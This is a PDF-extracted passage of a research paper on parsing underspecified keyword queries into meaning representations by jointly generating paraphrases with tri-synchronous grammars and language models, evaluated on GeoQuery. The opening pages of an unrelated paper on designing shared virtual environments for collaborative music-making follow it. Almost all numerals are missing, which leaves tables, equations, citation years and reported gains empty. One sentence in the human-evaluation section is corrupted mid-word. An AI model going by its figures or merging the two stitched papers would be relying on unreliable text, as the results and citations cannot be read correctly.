in this approach, for each pair, statistical word alignment aligns natural language tokens with the correspond- ing elements in the mr, then according to the align- ment, minimal rules are extracted with the ghkm algorithm (galley et al., ; li et al., ). then, up to k minimal rules are composed to form longer rules (galley et al., ), while considering the re- lationship between logical variables. finally, un- aligned nl tokens are aligned by attaching them to the highest node in the tree that does not break the consistencies of alignment, as specified in galley et al. ( ). . additional rules while basic rules extracted above are quite effective in parsing the training data, we found several prob- lems when we attempt to parse unseen queries. to make our parser more robust, we add two additional varieties of rules. first, we add a deletion rule which allows us to delete any arbitrary word w with any head symbol x, formally: x → ⟨w x, x⟩. ( ) this rule allows our grammar an option of ignoring words that it does not know what to do with. we achieve almost % f-measure in closed testing. in addition, to ensure that all of the facts in the database can be accessed by our semantic parser, we provide some additional scfg rules based on the given database of facts. the geoquery dataset pro- vides a database of facts represented as logical asser- tions. for every assertion provided in the database, we produce a single rule using the function name as the label of the non-terminal and one parameter of the assertion as the terminal, depending on the asser- tion’s type. for example, geoquery provides some details about the state of michigan with the form state(’michigan’,...), and thus we add state → ⟨michigan, michigan⟩ as an additional rule in the grammar. semantic parsing of keyword queries as explained in section , when users input key- word queries, they will often ignore the grammatical structure and omit function words. based on this, a traditional sp model can be problematic. to give a concrete example, consider the synchronous parse in figure . if we try to parse with only the keywords (e.g. “cities virginia”) with a standard grammar, the parser will not be able to recover the latent relation- ship “loc(x , x )” between the two words. unfortu- nately, we are lacking evidence to recover this re- lationship, because the token “in” associated with the predicate “loc” will often not occur in a keyword query. in this work, we perform experiments on this par- ticular variety of ambiguous input, both to examine the effect that it has on parsing accuracy under the baseline model, and to examine whether this sort of ambiguity can be reduced. in order to do so, we need examples of keyword queries. in this work, we sim- ulate the keyword query k by altering the original question s to make it more closely match the style of keyword queries. in particular, following the analy- sis of leveling ( ), we make two changes to the original queries: stop word deletion, and word order shuffling. stop word deletion, as its name implies, sim- ply deletes all stop words from the input sentence. we use a stop word list, making a few subjective changes to make the simulated keyword output more http://www.lextek.com/manuals/onix/stopwords .html realistic. specifically, we add “give” and “show,” which often occur in statements such as “give me ...” or “show me ...” but are unnatural in keyword queries. 
we also exclude from the list “us,” which often refers to “united states,” and function words such as “many,” “most,” and “much.” word order shuffling permutes the order of the keywords remaining after stop word deletion, to simulate the fact that keyword queries often don’t have strict order. first we shuffled the tokens ran- domly, then had a human annotator fix the order of the keywords manually, making the minimal num- ber of changes necessary to ensure that the queries are natural and fluent. this produced a single key- word query k for a particular question/mr pair in the geoquery database, which will be used to train and verify our system. at the end we will have a - parallel corpus consisting of pairs of keyword, question, and the meaning representation. we should note that while shortening and reorder- ing are prominent features of search queries (lev- eling, ), these are not the only phenomenon distinguishing queries from standard text. for ex- ample, humans tend to also change content words into an equivalent and easier word of their prefer- ence (gurský et al., ). while collecting this data is out of the scope of the present work, if a cor- pus of real keyword inputs and question paraphrases were available, it is theoretically possible for our proposed method to learn from this data as well. joint semantic parsing and paraphrasing using tri-synchronous grammars in this section we describe our proposed method to parse underspecified and ungrammatical input while jointly generating a paraphrase that can be used to disambiguate the meaning of the original query. . generalized synchronous context free grammars before defining the actual parsing framework, we first present a generalization of scfgs, the n- synchronous context free grammar (n-scfg) (neu- big et al., ). in an n-scfg, the elementary structures are rewrite rules of n − target sides: x → ⟨γ , γ , ..., γn⟩ ( ) grammar r query → ⟨conj , give me the conj , answer(x , conj )⟩ r conj → ⟨form state , form in state , (form , loc(x , x ), const(x , stateid(state )))⟩ r form → ⟨cities, cities, city(x )⟩ r state → ⟨virginia, virginia, virginia⟩ derivations ⟨query , query , query ⟩ r ⇒ ⟨conj , give me the conj , answer(x , conj )⟩ r ⇒ ⟨form state , give me the form in state , answer(x , (form , loc(x , x ), const(x , stateid(state ))) ⟩ r ⇒ ⟨cities state , give me the cities in state , answer(x , (city(x ), loc(x , x ), const(x , stateid(state )))⟩ r ⇒ ⟨cities virginia, give me the cities in virginia, answer(x , (city(x ), loc(x , x ), const(x , stateid(virginia)))⟩ figure : an example of -scfg rules and productions. here there are target sides, one is the paraphrase and the other is the mr where x is a non-terminal symbol, γ is the source side string of terminal and non-terminal symbols, and γ , ...γn are the target side strings. therefore, at each derivation step, one non-terminal in γ is cho- sen and all the corresponding non-terminals with the same index in {γ , ..., γn} are rewritten using a sin- gle rule. . tri-synchronous grammars for joint parsing and paraphrasing based on this framework, we propose a model for joint semantic parsing and paraphrasing using tri- synchronous grammars, or -scfgs. in this frame- work, input γ corresponds to a keyword query k, and the outputs γ and γ correspond to the para- phrase and mr respectively. an example of jointly generating a keyword query, question, and mr with a -scfg is shown in figure . 
in this work, we construct the tri-synchronous grammar by transforming the basic scfg for se- mantic parsing g into a -scfg. specifically, we first assume that the source question γs and target mr γt of the original scfg become the two out- puts γ and γ of the new -scfg grammar. γ is the newly added keyword query input. during the process of model training, we first ex- tract rules consisting of γ and γ using the algo- rithm in section . , then generate γ from γ by first deleting the stop-words then rearranging the or- der of the words based on word alignments between the keyword query and the original question. this is done by assigning each word in k a range of words in s to which it is aligned, then sorting words in γ in ascending order of these ranges. it is possible to have cases in which there are some words in k that have no alignment in s, and these rules are filtered out. finally, we use the tuple ⟨γ , γ , γ ⟩ to form rules in our tri-synchronous grammar. because of the stop word deletion, we may find that some rules have an empty source side, and con- sequently cannot be used in an scfg. for example, in r in figure , “in” is in the stop word list, and thus will be deleted from the source side, leaving it empty. in order to solve this problem, we compose all rules with empty inputs together with their parent rule. it should be noted that this introduces a large amount of ambiguity into the grammar, as the con- tent represented by the deleted content word must now be generated essentially out of thin air, based only on its parent context. . integrating language models with tri-scfgs when using scfgs for machine translation, the power of language models (lm) to improve the translation accuracy is widely acknowledged. the lm ensures fluent smt output by assigning a prob- ability to the target sentence. in case of n-gram lan- guage models, this probability is defined as: plm(w) = l∏ i= p(wi|wi− , wi− , ...wi−n+ ) ( ) where the probabilities of sentence w of length l is calculated as the product of the probability of its words, depending on the previous n − words. in- tegrating these language models makes the search space larger, precluding the use of the full cky-style parsing algorithm, but efficient approximate search algorithms such as cube pruning (chiang, ) or incremental search (heafield et al., ) can help ameliorate this problem. we could also consider constructing a probabilis- tic lm over mr t for semantic parsing. however, constructing a language model for the mr is less straightforward for several reasons. first, the order of the words of mr in the same rooted logical tree will not make a difference in the final result (e.g. for a commutative operator node). second, while lan- guage models for natural text benefit from the large amounts of text data available on the web, obtaining correct mrs to train a model is less trivial. on the other hand, in our tri-synchronous gram- mar framework, in addition to the mr itself, we are generating a paraphrase that nonetheless holds some disambiguating power over the mr, as described in section . the naturalness of this paraphrase out- put, like the output of the mt system, can easily be judged by a language model, and might have some correlation with the naturalness of the mr itself. thus, in this work we add a language model over the paraphrase output as a feature of the scoring model described in the next section. 
parse scoring given this scfg-based parsing model, we must now assign a score to decide which scores are bet- ter or worse than others. . scoring function our scoring function is a standard log linear model with feature functions defined over ⟨k,s,t ,d⟩ tu- ples: score(k,s,t ,d) = w · Φ(k,s,t ,d) ( ) where Φ(k,s,t ,d) is a vector of feature functions and w is the weight vector. . features for the baseline model, our feature vector Φ(k,s,t ,d) is simply defined as the element-wise sum of the feature vectors for each rule in the deriva- tion: Φ (k,s,t ,d) = ∑ d∈d Φ (d) ( ) where d takes the form in equation ( ). we score each basic rule using features widely used in translation as follows: • forward probability: the log probabil- ity of source side given all the target sides p(γ |γ , ..., γn), calculated based on rule counts in the training corpus c(γ , ..., γn)/c(γ , ..., γn). • backward probability: similarly, the log prob- ability of all target sides given the source side p(γ , ..., γn|γ ). • joint probability: the log probability of the source and target p(γ , γ , ..., γn). • terminal rule: equal to one if there is no non- terminal symbol in the rule. this feature is use- ful to decide whether the model prefers entirely lexicalized rules. • deletion: binary feature for deletion rules. • knowledge base rule: binary feature for rules produced from the knowledge base. for the proposed tri-synchronous grammar with lm verification, we additionally add three features defined over the generated paraphrase. • language model: counts the log language model probability of the paraphrase. • unknown: counts the number of tokens in the paraphrase that are unknown in the language model. • paraphrase length: counts the number of words in the paraphrase, and can be calculated for each rule as the number of terminals in the paraphrase. this feature helps compensate for the fact that language models prefer shorter sentences. . learning feature weights now that we have defined the feature space, we need to optimize the weights. for this we use minimum error rate training (mert) (och and ney, ), maximizing the number of correct answers over the entire corpus. experiment and analysis we evaluate our system using the geoquery corpus (zelle and mooney, ), which contains sen- tences representing natural language questions about u.s. geography, and their corresponding mrs. . setup • data: we use the full geoquery dataset us- ing the same folds of and test data used by wong and mooney ( ). we cre- ated keyword queries according to the process described in section . we follow standard pro- cedure of removing punctuation for all natural language text, regardless of whether it is a key- word or full question. we also perform stem- ming on all natural language text, both in the keyword and question queries. • rule extraction: alignment is performed by pialign (neubig et al., ) with the set- ting forcing one-to-many alignments. the al- gorithm to extract the tri-synchronous grammar is as discussed in section . and maximum size of the rules for composition is . • decoding: to query the database, we use prolog queries fired against the geoquery we also tried gradient-based optimization methods and large feature sets as in wong and mooney ( ) and li et al. ( ), but the dense feature set and mert achieved similar results with shorter training time. database. the parsing problem can thus be con- sidered the task of decoding from underspec- ified natural language queries into prolog queries. 
this is done by performing decoding of the scfg-based parsing model to translate the input query into an mr including λ calculus expressions, performing β-reduction to remove the λ function, then firing the query against the database. before querying the database, we also apply wong and mooney ( )’s type- checking to ensure that all mrs are logically valid. for parsing, we implemented cky- based parsing of tri-synchronous grammars on top of the travatar (neubig, ) decoder. unless otherwise specified, the default settings of the decoder are used. • language model: for all -scfg systems we use a -gram kneser-ney smoothed lan- guage model trained using the kenlm toolkit (heafield, ). standard preprocessing such as lowercasing and tokenization is performed before training the models. as it is of inter- est whether or not the type of data used to train the language model affects the resulting perfor- mance, we build language models on several types of data. first, we use a corpus of news data from the workshop on machine translation evaluation data (callison-burch et al., ) (news). this data represents standard english text unrelated to questions. second, we use a part of the question paraphrase data gathered by fader et al. ( ) (questions). this data consists entirely of questions, and thus is a better rep- resentative of the latent questions behind the input queries. finally, we used the full ques- tions from geoquery sentences to build the language model, building a different language model for each fold, completely separate from the test set. table gives the details of each dataset. in addition, because the geoquery data is useful but small, for all -scfg systems, we perform experiments using an additional - we use only data set from the sets released at http://knowitall.cs.washington.edu/afader/paraphrases. data sent. tok. lm size news . m m . g questions . m m . g geoquery ∼ . k ∼ k table : details of the data used to build lms gram feed-forward neural network language model (nnlm) (bengio et al., ) feature, which is possibly better equipped to handle sparse data than standard n-grams. the nnlm is built on geoquery sentences, excluding the test sentences for each fold. this feature is not produced during parsing, but is separately scored and used to re-rank the n-best list gen- erated by the parser. integration with the paraphrase language model is performed using incremental search (heafield et al., ). for the parsing with nnlm, we recalculate the score of the para- phrases by firstly adding the nnlm score as one of the feature in equation and taking the parse with the best score. • parameter optimization: for learning the pa- rameters of the scoring function we use -fold cross validation on the training data, i.e. each fold iteration uses model trained on exam- ples and to parse the remaining . first we run decoding for all folds and gather the results. then we run mert with the combined results to update the parameters. we use the standard evaluation measure of question answering ac- curacy as our objective function and set the n- best list to be the top derivations. to learn the weights for rescoring with the nnlm, we first generate an n-best list with the base model not using the nnlm feature. we then calculate the nnlm feature for each hy- pothesis in the n-best list, and run one more run of mert with this feature to obtain the weights used in the rescoring model. 
• evaluation: following the definition from zettlemoyer and collins ( ) and wong and mooney ( ), we use question answering ac- curacy as our evaluation measure. we define recall as the fraction of correct answers divided by the number of test data, precision as the frac- tion of correct answers divided by the number of parsed queries and f-measure as the har- monic mean of the two. the query is judged correct if and only if the scfg can gener- ate a valid parse tree, and the resulting query does not produce any syntax errors when ac- cessing the database through a prolog query. note that all questions are used for testing through cross validation, so a recall improve- ment of . is approximately equal to an- swering one more question correctly. . parsing accuracy results input method p r f question direct . . . keyword direct . . . tri-lm . . . tri+lm . . . table : parsing accuracy, where keyword direct is the baseline for semantic parsing on keyword queries, and the tri with the lm for verification is our proposed method. bold indicates a significant gain over both direct and tri- lm for keyword input according to bootstrap resampling (koehn, ) (p < . ). first, in this section, we examine the effect of the proposed method on accuracy of parsing ambiguous keyword queries. specifically, in table we show the baseline “direct” method of training a standard scfg-based semantic parser, the proposed method without language model verification “tri-lm,” and the proposed method using the questions lan- guage model with nnlm reranking “tri+lm.” looking at the baseline accuracy over full ques- tions (first row), we can see the recall is slightly su- perior to wong and mooney ( )’s . % and li et al. ( )’s . %, demonstrating our baseline is comparable to previous work. when we apply the same method to parse the keyword queries (second row), however, the recall drops almost %, showing that the ambiguity included in the keyword query in- put causes large decreases in accuracy of a semantic parser built according to the baseline method. this ambiguity is also reflected in the number of mrs generatable by the parser for any particular input. in the top list generated by each parser, there were ex. lm paraphrase/mr correct direct answer(a,(capital(a),loc(a,b),largest(c,population(b,c)))) no tri-lm answer(a,largest(b,(capital(a),population(a,b)))) yes tri+lm what capital has the largest population original question: what capital has the largest population original mr: answer(a,largest(b,(capital(a),population(a,b)))) keyword: largest population capital direct(-) answer(a,largest(a,(capital(a),city(a),loc(a,b),state(b)))) no tri-lm answer(a,largest(a,(state(a),loc(a,b),capital(b)))) no what is the largest state in capital tri+lm answer(a,(state(a),loc(b,a),largest(b,capital(b)))) yes what state has the largest capital original question: what state has the largest capital original mr: answer(a,(state(a),loc(b,a),largest(b,capital(b)))) keyword: largest capital state table : examples of paraphrase outputs produced by the direct keyword-mr system, and the proposed systems without and with a language model. a total of . and . unique mrs for question and keyword input respectively. now we take a look at the -scfg (third row) without the lm verification, we can see the results are similar to the baseline. 
then, when adding the language model to the -scfg system (fourth row) we can see a significant of - % gain over the di- rect and the tri-lm systems, demonstrating that the proposed method of paraphrasing and verification is indeed able to resolve some of the ambiguity in the keyword queries. to illustrate how the language model helps, we provide two examples in table . the first example shows that considering the original question when parsing from keywords can help improve alignment with the mr for more plausible results. the sec- ond example shows the effect of adding the language model to disambiguate the keyword query. here there are several interpretations for the keyword- query “largest capital state,” which also can mean “state that has the largest capital,” or “largest state in the capital.” the system without the language model incorrectly chooses the latter interpretation, but the system with language model correctly dis- ambiguates the sentence as it considers the phrase “state in capital” is unlikely, showing the effective- ness of our method. . analysis we first examine the effect of choice of language model in the first two columns of table . the first column is the full model with nnlm re-ranking, and the second column is without. the rows show the effect of using different data to train the n-gram lm. all the systems using lms are basically bet- ter than the system using neither an n-gram lm nor the nnlm. looking at the differences between the n-gram lms, we can see that the questions lm tends to be the most effective. this is particularly encouraging as the questions language model does not contain any domain specific content, but is able to outperform the geoquery domain spe- cific lm. we also found that, as expected, the more sophisticated neural network language model raises the system accuracy by approximately %, which also supports our proposed idea that a better lm will better raise system accuracy. the proposed method aims at reducing nonsen- sical interpretations, and another trivial baseline that can achieve a similar effect is to filter out the queries that produce empty answers, with the as- sumption that empty answers are generated from in- valid queries. this simple filtering method reduced the number of unique queries to . for questions and . for keywords. however, as shown in the “-empty” results in table , we found that this fil- input output lm full -nnlm -empty p r f p r f p r f keyword q+mr - . . . . . . . . . news . . . . . . . . . quest . † . † . † . . . . . . geo . . . . . . . . . table : the result of experiment with/without neural network language model for the proposed -scfg framework. question-lm +nnlm achieved the best accuracy. bold indicates a significant gain over the baseline direct keyword (second row of table ) and dagger indicates a significant gain over the -scfg baseline without language model (-nnlm column, first row). the full and -empty column use nnlm as language model. the first row of the -nnlm column is the experiment without any language model. tering method is not effective, causing the system’s performance to drop by around %. this is caused by the fact that the correct answer is sometimes an empty answer, for example “what states border hawaii?” . human evaluation while all evaluation up to this point has used lan- guage models to disambiguate paraphrases, we can assume that human users will be even better at judg- ing whether or not a paraphrase makes sense. 
thus, we perform an additional evaluation in which hu- man annotators evaluate the paraphrases generated from the systems. first, we took the -best parse and random parses from the tri+lm and tri-lm systems where both systems produced a non-empty n-best. then we show both the keyword queries and all the paraphrases to human evaluators to annotate: i) a fluency score of , , or where is completely unnatural english, indicates minor grammatical errors, and indicates flawless english, ii) a letter starting from “a”, “b”, etc. for the paraphrase that matches their preferred interpretation of the search query. if the input has multiple interpretations, then a different letter is assigned for each possible inter- pretation in the order that the annotator believes that the interpretation is the correct one, and only para- phrase paraphrase is chosen for each interpretation. if the human annotator does not find the paraphrase that matched his/her pboth features set.igned and an- notation starts from “b.” annotators were asked to annotate keyword queries and their paraphrases. here the letters are just the indicators of ranking with a let- ter “a” means the most possible interpretation of search queries according to the users. there are a total of keyword queries (out of ) that produced a non-empty n-best list in both sys- tems, so we chose random duplications of inputs to make the sum . system precision tri-lm . tri+lm . tri+lm+human . table : system precision with additional human help. table shows the improvement of the system with human help. we take all the answers from the annotators that were annotated with “a” and re- placed the answer of tri+lm system. overall, there were questions that changed between the -best and human choices, with improving and de- grading accuracy. this experiment suggests that it is possible to show the generated paraphrases to hu- man users to improve the accuracy of the semantic parser. system fluency ratio precision tri-lm . . . . . . tri+lm . . . . . . table : fluency, ratio, and precision statistics for the one-best of both systems. now we look at the relationship between the flu- ency of the paraphrase and the accuracy of the se- mantic parsers in table . the statistics are gathered letter system count total precision a tri-lm . tri+lm . b tri-lm . tri+lm . c tri-lm . tri+lm . d tri-lm . tri+lm . table : a result for the letter accuracy from the human evaluation. note that counts do not sum up to total be- cause it is possible that both systems generate same para- phrases. from the one best output for both systems. tri+lm had a significantly larger percentage of fluent para- phrases with score “ ” ( % v.s. %) compared to the system without the language model. of the paraphrases that were assigned “ ” score, % cor- responded to correct mrs, indicating that the sub- jective fluency of the paraphrase is a good indicator of parsing accuracy. finally, table shows the relationship between the rank of the human interpretation and the accu- racy of semantic parsing. out of the problems shown to the annotators, of them were ranked “a.” this experiment showed that the interpretation of the paraphrase judged as most likely by the anno- tators achieves a high precision, confirming our hy- potheses that humans are able to use paraphrases to accurately judge whether the interpretation is likely to be correct or not. . 
other methods for using paraphrase data in addition to the method describe up until this point, there are several other ways to potentially incorpo- rate paraphrasing into syntactic parsing of under- specified input. in this section we briefly outline two other (unsuccessful) attempts to do so: creation of a pipelined paraphrasing/semantic parsing sys- tem, and addition of features from a large paraphrase database. first, regarding the pipelined system, we build the paraphrasing system using the parallel keyword- question data, with standard settings of hierarchical phrase-based translation (chiang, ), and stan- dard smt features. we use the geoquery n-gram model for the language model used during decoding and nnlm language model to finally rerank the n- best list. as a result of experiments, even though this system obtained a respectable bleu score of . , the parsing accuracies were much lower than the direct keyword-mr system at . f-measure. an analysis showed that, perhaps as expected, this was caused by cascading errors, with unnatural para- phrases also resulting in failed semantic parses. in addition, we also attempted to use the external questions data to calculate additional features to our tri+lm system. we do this by first simulat- ing the keyword version for each sentence in the questions data by performing shuffling and stop- word deletion. next we train a hierarchical phrase-based system on this data to create a paraphrasing model. next we intersect this model with our existing model by matching the source side and the target side of the rules and if they match, taking the union of the fea- tures sets. unfortunately, however, this setting also did not allow for a gain in accuracy, likely due to to the low recall ( %) of the matching between paraphrasing grammar and semantic parsing rules. this low recall stemmed from a number of factors including restrictions on the standard hiero para- phrasing grammars (no more than non-terminals, no consecutive non-terminals on the source side, and no rules without at least one terminal), as well as simple lack of coverage of the words in the para- phrase database. this result does indicate room for improvement by developing algorithms that extract paraphrases that are closely related to the semantic parsing rules, but also suggests potential difficulties in simply applying paraphrasing resources such as ppdb (ganitkevitch et al., ). related work interpretation of search queries is a major concern in the field of information retrieval as it can affect the choice of retrieved documents. underspecified queries are commonly entered into search engines, leading to large result sets that are difficult for users because the shuffling process is random we could conceiv- ably generate and train with multiple shuffled versions, but be- cause the questions data is relatively large already, we only train the paraphrasing system with the single permutation of keywords generated by the shuffling. to navigate (sajjad et al., ). studies have shown that there are several ways to deal with this problem, including query reformulation, which can fall in the categories of query expansion or query substitution (shokouhi et al., ; xue and croft, ). lev- eling ( ) proposed a paraphrasing method that tries to reconstruct original questions given keyword inputs in the ir context, but did not model this re- formulation together with semantic parsing. in ad- dition, wang et al. 
( ) showed that doing para- phrasing on the queries for web search is able to re- duce the mismatch between queries and documents, resulting in a gain in search accuracy. using paraphrasing to resolve ambiguity is not new, as it was used to resolve ambiguity interac- tively with a user’s input (mckeown, ). ge and mooney ( ) and miller et al. ( ) have also used the guidance of natural language syntax for semantic parsing. however, the usage of natu- ral language syntax in the semantic parsing on key- word queries are not trivial. for example, the ap- proach using syntax tree of the input side from ge and mooney ( ) can not be directly applied to the keyword query as syntax parsing on keyword query itself is not a trivial problem. there have also been a few methods proposed to combine paraphrasing with semantic parsing. fader et al. ( ) proposed a method to map from full questions to more canonical forms of these ques- tions, with the canonical nl questions being triv- ially convertible to an mr. berant and liang ( ) extract entities from a full-text question, map these entities into a set of candidate mrs, and generate canonical utterances accordingly. then the canoni- cal utterance that best paraphrases the input is cho- sen, thereby outputting the corresponding mr. our approach is the similar but orthogonal to these works in that we focus on situations where the original user input is underspecified, and try to generate a natu- ral language paraphrase that more explicitly states the user intention for disambiguation purposes. a second difference is that we do not use separate model to do paraphrasing, instead using the same model to do paraphrasing and semantic parsing syn- chronously. this has the advantage of being able to scale more easily to complicated and highly com- positional questions such as the ones found in geo- query. in addition to being useful for semantic parsing, scfgs have also been used for paraphrasing. a va- riety of research has used scfg-based paraphrases for text-to-text generation tasks like sentence com- pression (cohn and lapata, ; ganitkevitch et al., ), or expanding the set of reference transla- tions for machine translation evaluation (madnani et al., ). in this paper we have introduced a novel use of -way scfgs that allows us to simultane- ously do semantic parsing and text-to-text genera- tion. to our knowledge, this is the first method to parse an underspecified input by trying to reconstruct a more explicit paraphrase of the input and validate the naturalness of the paraphrase to disambiguate the meaning of the original input. conclusion and future work in this paper we introduced a method for construct- ing a semantic parser for ambiguous input that para- phrases the ambiguous input into a more explicit form, and verifies the correctness using a language model. we do so through a generalization of syn- chronous context free grammars that allows for gen- eration of multiple output strings at one time. an evaluation showed that our method is effective in helping compensate for the % loss of system accu- racies due to the ambiguity of the keyword queries, providing a % improvement. human evaluation also confirmed that manually evaluating the para- phrases generated by our framework can improve the accuracy of the semantic parser further. there are a number of future directions for this study. first, we plan to scale the proposed method to open domain semantic parsing of search queries over extensive knowledge bases such as freebase (bollacker, ). 
in addition, previous works have tackled semantic parsing directly from question and answer pairs (liang et al., ; poon and domin- gos, ; artzi and zettlemoyer, ). the idea of learning from unannotated data is attractive, and incorporating this learning framework into our model is a promising direction for future work. acknowledgments we thank professor yuji matsumoto and assistant professor kevin duh for the discussions and insight- ful ideas for the paper. we also thank professor chris callison-burch and anonymous reviewers for their suggestions and discussions. this project is supported by grants from the min- istry of education, culture, sport, science, and technology of japan and from the microsoft core program. references yoav artzi and luke zettlemoyer. . bootstrapping semantic parsers from conversations. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – . yoshua bengio, ducharme réjean, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search, : – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the th an- nual meeting of the association for computational linguistics (acl), pages – . kurt bollacker. . a platform for scalable, collabo- rative, structured information integration. in proceed- ings of the nd association ofr advancement of arti- ficial intelligence, pages – . chris callison-burch, philipp koehn, christof monz, and omar f zaidan. . findings of the work- shop on statistical machine translation. in proceedings of the sixth workshop on statistical machine transla- tion, pages – . david chiang. . hierarchical phrase-based transla- tion. computational linguistics, ( ): – . trevor cohn and mirella lapata. . sentence com- pression as tree transduction. journal of artificial in- telligence research (jair), : – . anthony fader, luke zettlemoyer, and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – . michel galley, mark hopkins, kevin knight, and daniel marcu. . what’s in a translation rule? in proceedings of the human language technol- ogy conference of the north american chapter of the association for computational linguistics (hlt- naacl), pages – . michel galley, jonathan graehl, kevin knight, daniel marcu, steve deneefe, wei wang, and ignacio thayer. . scalable inference and training of context-rich syntactic translation models. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . juri ganitkevitch, chris callison-burch, courtney napoles, and benjamin van durme. . learning sentential paraphrases from bilingual parallel corpora for text-to-text generation. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . asso- ciation for computational linguistics. juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , atlanta, georgia, june. as- sociation for computational linguistics. ruifang ge and raymond j mooney. . learning a compositional semantic parser using an existing syn- tactic parser. 
in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume -volume , pages – . peter gurský, tomás horváth, peter vojtás, jozef jirásek, stanislav krajci, robert novotny, jana pribolová, and veronika vaneková. . user preference web search – experiments with a system connecting web and user. computing and informatics, ( ): – . kenneth heafield, philipp koehn, and alon lavie. . grouping language model boundary words to speed k- best extraction from hypergraphs. in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – . kenneth heafield. . kenlm: faster and smaller lan- guage model queries. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – . philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of the conference on empirical methods in natural language processing (emnlp). tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . johannes leveling. . a comparative analysis: qa evaluation questions versus real-world queries. in pro- ceedings of the th international conference on lan- guage resources and evaluation (lrec). peng li, yang liu, and maosong sun. . an ex- tended ghkm algorithm for inducing lambda-scfg. in proceedings of the th association for advance- ment of artificial intelligence, pages – . percy liang, michael i. jordan, and dan klein. . learning dependency-based compositional semantics. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . nitin madnani, necip fazil ayan, philip resnik, and bonnie dorr. . using paraphrases for parameter tuning in statistical machine translation. in proceed- ings of the workshop on statistical machine transla- tion (wmt ), prague, czech republic. kathleen r. mckeown. . paraphrasing questions using given and new information. computational lin- guistics, ( ): – . scott miller, robert bobrow, robert ingria, and richard schwartz. . hidden understanding models of natural language. in proceedings of the nd annual meeting of the association for computational linguis- tics (acl), pages – . graham neubig, taro watanabe, eiichiro sumita, shin- suke mori, and tatsuya kawahara. . an unsuper- vised model for joint phrase alignment and extraction. in proceedings of the th annual meeting of the as- sociation for computational linguistics: human lan- guage technologies (hlt-acl), pages – . graham neubig, philip arthur, and kevin duh. . multi-target machine translation with multi- synchronous context-free grammars. in meeting of the north american chapter of the association for com- putational linguistics (naacl), denver, usa, may. graham neubig. . travatar: a forest-to-string ma- chine translation engine based on tree transducers. in acl (conference system demonstrations), pages – . franz josef och and hermann ney. . a system- atic comparison of various statistical alignment mod- els. computational linguistics, ( ): – . hoifung poon and pedro domingos. . unsuper- vised semantic parsing. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . hassan sajjad, patrick pantel, and michael gamon. . 
underspecified query refinement via natural language question generation. in proceedings of the th international conference on computational lin- guistics (coling), pages – . milad shokouhi, rosie jones, umut ozertem, karthik raghunathan, and fernando diaz. . mobile query reformulations. in proceedings of the th in- ternational acm sigir conference on research & development in information retrieval, pages – . chenguang wang, nan duan, ming zhou, and ming zhang. . paraphrasing adaptation for web search ranking. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . yuk wah wong and raymond j mooney. . learn- ing for semantic parsing with statistical machine trans- lation. in proceedings of the human language technology conference of the north american chap- ter of the association for computational linguistics (hlt-naacl), pages – . yuk wah wong and raymond j mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in proceedings of the th annual meeting of the association for computational linguis- tics (acl), number , pages – . xiaobing xue and w. bruce croft. . modeling re- formulation using query distributions. acm transac- tion on information systems, ( ): : – : . john m. zelle and raymond j. mooney. . learn- ing to parse database queries using inductive logic pro- gramming. in proceedings of the th national con- ference on artificial intelligence, pages – . luke s zettlemoyer and michael collins. . learn- ing to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. un- certainty in artificial intelligence (uai), pages – . luke s zettlemoyer and michael collins. . on- line learning of relaxed ccg grammars for parsing to logical form. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp-conll), pages – . submitted june accepted september published november corresponding author liang men, l.men@qmul.ac.uk academic editor john carroll additional information and declarations can be found on page doi . /peerj-cs. copyright men et al. distributed under creative commons cc-by . open access designing spaces to support collaborative creativity in shared virtual environments liang men, nick bryan-kinns and louise bryce school of electronic engineering and computer science, queen mary university of london, london, united kingdom abstract shared virtual environments (sves) have been researched extensively within the fields of education, entertainment, work, and training, yet there has been limited research on the creative and collaborative aspects of interactivity in sves. the important role that creativity and collaboration play in human society raises the question of the way that virtual working spaces might be designed to support collaborative creativity in sves. in this paper, we outline an sve named lemo, which allows two people to collaboratively create a short loop of music together. then we present a study of lemo, in which users composed music in pairs using four different virtual working space configurations. 
key findings indicated by results include: (i) providing personal space is an effective way to support collaborative creativity in sves, (ii) personal spaces with a fluid light-weight boundary could provide enough support, worked better and was preferable to ones with rigid boundaries and (iii) a configuration that provides a movable personal space was preferred to one that provided no mobility. following these findings, five corresponding design implications for shared virtual environments focusing on supporting collaborative creativity are given and conclusions are made. subjects human-computer interaction, social computing keywords collaborative cretivity, virtual reality, shared virtual environment, collaborative music making, sonic interaction design, gesture design, hci introduction the real world envelops us with space that we share with others; in this surrounding environment, we perceive rich sensory information about objects and events happening around us. using this information, we interact with this outer world around us via inference, manipulation, and exploration. in a similar fashion we interact with other people. in other words, space can be seen as a material of human activity (raffestin, ), and it has a great influence on social activity, e.g., the size of space limits what kind of actions can be performed, the fill material of a space limits how far people can see or hear, and the proxemics between bodies and objects in a space limits their scope of influence. digital virtual spaces have existed in different forms for several decades. one of the earliest examples are digital games, e.g., star trek created in early s provides a computational space that players can visit and experience through text descriptions on a computer screen, see (case, ploog & fantino, ). though these non-immersive media can involve people to a very high level and generate the experience of flow, few of them have enabled people to interact in a natural way that is similar to the way that people how to cite this article men l, bryan-kinns n, bryce l. . designing spaces to support collaborative creativity in shared virtual envi- ronments. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science 